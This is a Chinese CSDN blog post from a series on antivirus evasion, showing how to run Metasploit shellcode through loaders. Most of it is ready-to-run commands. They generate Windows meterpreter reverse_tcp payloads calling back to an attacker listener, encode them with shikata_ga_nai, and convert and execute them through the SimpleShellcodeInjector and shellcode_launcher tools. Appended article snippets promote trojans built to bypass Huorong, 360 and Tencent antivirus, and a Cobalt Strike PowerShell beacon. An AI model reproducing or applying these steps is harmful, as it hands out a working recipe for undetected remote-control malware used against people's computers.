WEB渗透免杀篇-加载器免杀

已于 2024-08-21 14:04:28 修改
阅读量280 收藏 10
点赞数 6
分类专栏: 渗透测试 文章标签: 网络安全 WEB渗透 渗透测试 WEB安全
于 2024-08-16 11:50:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59468567/article/details/141255910
版权

  往期文章

 WEB渗透免杀篇-免杀工具全集-CSDN博客 

  WEB渗透免杀篇-加载器免杀-CSDN博客

 WEB渗透免杀篇-分块免杀-CSDN博客

WEB渗透免杀篇-Powershell免杀-CSDN博客

WEB渗透免杀篇-Python源码免杀-CSDN博客

WEB渗透免杀篇-C#源码免杀-CSDN博客

WEB渗透免杀篇-MSF+shellcode免杀-CSDN博客

WEB渗透免杀篇-MSF免杀-CSDN博客

WEB渗透免杀篇-Bypass-AMSI-CSDN博客

WEB渗透免杀篇-Golang免杀-CSDN博客

WEB渗透免杀篇-Pezor免杀-CSDN博客

WEB渗透免杀篇-cshot远程shellcode-CSDN博客

SSI加载

https://github.com/DimopoulosElias/SimpleShellcodeInjector

生成payload(c)

image

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f c -o shellcode.c

执行

cat shellcode.c |grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

MSF监听 可使用minGW自行编译

gcc SimpleShellcodeInjector.c -o xxx.exe

执行

xxx.exe +生成的编码

shellcode_launcher

https://github.com/clinicallyinane/shellcode_launcher/

生成payload(raw)

>msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f raw -o shellcode.raw

加载器加载

>shellcode_launcher.exe -i shellcode.raw
Pluto-2003
关注
专栏目录
msfvenom 生成 免杀
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-19 478
1)PrependMigrate=true PrependMigrateProc=svchost.exe 使这个程序默认会迁移到svchost.exe进程。2)使用-p指定使用的攻击载荷模块,使用-e指定使用x86/shikata_ga_nai编码,使用-f选项告诉MSF编码输出格式为c。生成的shell程序执行后会启动两个进程shell.exe和svchost.exe,关闭其中一个不会影响会话状态。shikata_ga_nai 是只支持32位的,所以一定不能用64位编译。
web渗透--16--越权漏洞
武天旭的博客
09-12 1万+
1、漏洞描述 越权访问,这类漏洞是指应用在检查授权(Authorization)时存在纰漏,使得攻击者在获得低权限用户帐后后,可以利用一些方式绕过权限检查,访问或者操作到原本无权访问的高权限功能。在实际的代码安全审查中,这类漏洞往往很难通过工具进行自动化检测,因此在实际应用中危害很大。其与未授权访问有一定差别。目前存在着两种越权操作类型:横向越权操作和纵向越权操作。 ...
利用msfvenom制作windows木马及免杀
热门推荐
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马: msfvenom -a x86 --platform window...
msfvenom——木马免杀
tomyyyyy
08-24 2996
msfvenom——木马免杀 目录msfvenom——木马免杀c语言执行生成shellcode.cc语言执行检查python语言执行方法一:python加载C代码方法2:py2exe打包编译exe方法3:base64编码c语言执行 生成shellcode.c msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_t...
MSF免杀
LainWith的博客
12-12 3000
MSF 参考: 远控免杀专题文章(2)-msfvenom隐藏的参数 远控免杀专题文章(3)-msf自免杀(VT免杀率35/69) msfvenom简介 msfvenom是msfpayload和msfencode的结合体,于2015年6月8日取代了msfpayload和msfencode。在此之后,metasploit-framework下面的的msfpayload(荷载生成),msfencoder(编码),msfcli(监听接口)都不再被支持。 参数 ![image.png](https://img
使用msfvenom免杀火绒
2301_76718200的博客
11-11 1032
文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win。2、再使用msfvenom生成一个捆绑可以被windows执行的exe木马文件。3、把刚刚生成的exe木马文件传输到我们的win11物理机上。1、首先到火绒官网上下载个火绒安装包后放到kali中。#修改成我们之前生成木马时使用的payload。前提把杀软关闭要不然会杀掉,没有做免杀的木马。靶机,启动火绒点击我们编译过的木马程序。点击后就连接上我们的kali攻击机了。#设置kali的IP地址为监听地址。
web渗透--54--客户端资源处理漏洞
武天旭的博客
09-23 1204
1、漏洞描述 客户端资源处理漏洞是指当一个应用程序接受一个由用户控制并指定资源路径的输入时,发生的输入验证漏洞。具体而言,这种漏洞具有控制URL链接到存在于网页中的某些资源的能力。受到的影响可能会因攻击者控制的URL元素类型不同而不同,它通常会采用跨站点脚本攻击方式来进行。
web渗透--25--XXE外部实体注入
武天旭的博客
09-16 1375
1、漏洞描述: XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击。漏洞是在对非安全的外部实体数据进行处理时引发的安全问题。 在XML1.0标准里,XML文档结构里定义了实体(entity)这个概念。实体可以通过预定义在文档中调用,实体的标识符可访问本地或远程内容。如果在这个过程中引入了“污染”源,在对XML文档处理后则可能导致...
网络安全kali渗透学习 web渗透入门 Metasploit渗透测试框架介绍-Metasploitable2-Linux 靶机系统介绍
xueshenlaila的博客
02-28 2249
Metasploit是一个免费的、可下载的框架,通过它可以很容易对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。
web渗透--46--不安全的对象引用
武天旭的博客
09-22 3399
1、漏洞描述 在有不安全直接对象引用漏洞的情况下,通过修改用于直接检索对象的参数的值,攻击者就可以绕过授权对资源进行访问。被访问的资源甚至可以完全属于其他用户,也可以是系统文件等。该漏洞是应用程序未做充分授权检查的情况下,使用用户提供的输入数据对对象进行检索造成的。
SimpleShellcodeInjector:SimpleShellcodeInjector接收十六进制的shellcode作为参数并执行它。 它不会在第三方应用程序中注入shellcode
05-14
SimpleShellcodeInjector(SSI) 描述 SimpleShellcodeInjector或SSI接收十六进制的shellcode作为参数并执行它。 它不会将shellcode注入第三方应用程序中,并且对于诸如Get-InjectedThread之类的工具始终处于监视之下。 目前,即使您在不混淆的情况下执行了meterpreter的shellcode,许多防病毒解决方案也无法检测到它。 让我注意到,尽管您可以使用SSI来接收抄表,但它不是metasploit的登台者。 它只是执行您提供的shellcode。 防病毒检测(比率:0/30) 经过积极测试 目前,它已经针对以下解决方案进行了积极测试(默认设置-完全更新),并且成功返回了反向抄表: Windows Defender的 赛门铁克端点保护 卡巴斯基 ESET-Smart Security Premium(试用
SimpleShellcode:利用图片隐写术来远程动态加载shellcode
05-27
0x01 前言 将Shellcode隐写到正常BMP图片中,把字符串拆成字节,写入每个像素的alpha通道中,然后上传到可信任的网站下偏移拼接shellcode进行远程动态加载,能有效地增加了免杀性和隐匿性。 0x02 参考链接
Msfvenom编码免杀技术实现免杀实战
weixin_43062666的博客
07-10 3120
免杀技术在网络渗透的实战中十分实用,本文将介绍使用msfvenom自带编码免杀工具进行编码免杀,从而实现绕过杀毒软件获得shell的具体方法。 按照文中所讲述的方法制作的木马载荷可以绕开国内所使用的大多数杀毒软件,包括但不限于火绒,腾讯,百度,金山,virustotal沙箱查杀率12,简单但实用...
远控免杀学习笔记-msfvenom自带免杀
m0_49025459的博客
04-10 726
生成的payload.exe在/home/kali/.msf4/local/目录下,然后扔沙箱里看一下。
木马与免杀(1), msfvenom 工具, 木马生成, 编码免杀, 在线木马检测
最新发布
探测???
12-06 957
Msfvenom是Metasploit框架中的一个强大工具,用于生成定制的恶意软件载荷,包括反向Shell、Meterpreter Shell、编码的Payload等[3]。它主要用来生成带后门的软件,是Msfpayload和Msfencode的组合,用于生成木马和软件捆绑后门[1][2][4]。在Kali Linux中有一个集成好的工具是msfvenom,主要用于生成后门和软件捆绑后门,其免杀效果还算不错[5]。
Web渗透之MSF框架——msfvenom与免杀木马制作
Mr_Wanderer的博客
08-07 4740
文章目录生成常见的反向连接木马反向连接的优势:Windows:Linux:MAC:PHP:Asp:Aspx:msfvenom参数介绍生成免杀木马360免杀木马腾讯管家免杀木马免杀木马测试写在最后 生成常见的反向连接木马 连接一般分为正向连接和反向连接: 正向连接为: 对方服务开放端口,让我们去访问 反向连接为: 我们开放端口,让对方访问。也就是让对方来找我们的端口 反向连接的优势: 1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。它的ip会动态改变,你不能持续控制。 2.由于防火墙等限制,对方
msfvenom的使用&免杀&外网渗透
`or 1 or 不正经の泡泡
03-13 6199
msfvenom的基本使用 这玩意是啥我就不介绍了,懂得都懂. 这博客将结合我本人的自身经验来说明大致的使用方式,这里的话只介绍,目前比较常用的几个方法和参数. payload 查看与使用 payload你可以理解为就是一种攻击的方案,生成何种攻击方式,对那种平台进行攻击 使用参数 -p来进行设置, 查看为-l payload具体的看如下案例 encoders的使用 参数 -e 这个是指选择何种方式编码,提高木马免杀的概率,此外还有参数 -i -b 不过有本人亲测使用-e即可,甚至不用指定,原因是无论你
免杀马学习(MSF二进制混淆加密)
红队是青春
02-01 526
2022年笔记,刚入行前免杀马的学习
Cobalt Strike免杀:利用Powershell隐蔽上线
"Cobalt Strike beacon 免杀上线方法通过 Powershell" 本文将介绍如何使用 Cobalt Strike 创建一个免杀的 PowerShell payload 并在目标环境中隐蔽上线。Cobalt Strike 是一款广泛用于红队操作和渗透测试安全工具...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pluto-2003

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值